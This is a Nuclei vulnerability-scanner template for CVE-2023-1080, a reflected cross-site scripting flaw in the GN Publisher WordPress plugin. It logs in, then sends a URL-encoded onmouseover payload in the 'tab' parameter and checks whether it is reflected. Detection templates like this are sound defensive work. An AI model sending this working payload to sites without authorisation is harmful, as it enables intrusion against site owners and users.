nuclei-templates/cves/2023/CVE-2023-1080.yaml

46 lines
1.6 KiB
YAML

id: CVE-2023-1080
info:
name: GN Publisher < 1.5.6 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
GN Publisher plugin < 1.5.6 vulnerable to Reflected Cross-Site Scripting via the tab parameter in versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping.
reference:
- https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74
- https://wordpress.org/plugins/gn-publisher/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1080
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57
remediation: Fixed in version 1.5.6
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1080
cwe-id: CWE-79
metadata:
verified: "true"
tags: wp-plugin,wordpress,gn-publisher,authenticated,cve2023,wp,xss,wpscan,cve
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "/ onmouseover=alert(document.domain);//")'
- 'contains(body_2, "GN Publisher")'
condition: and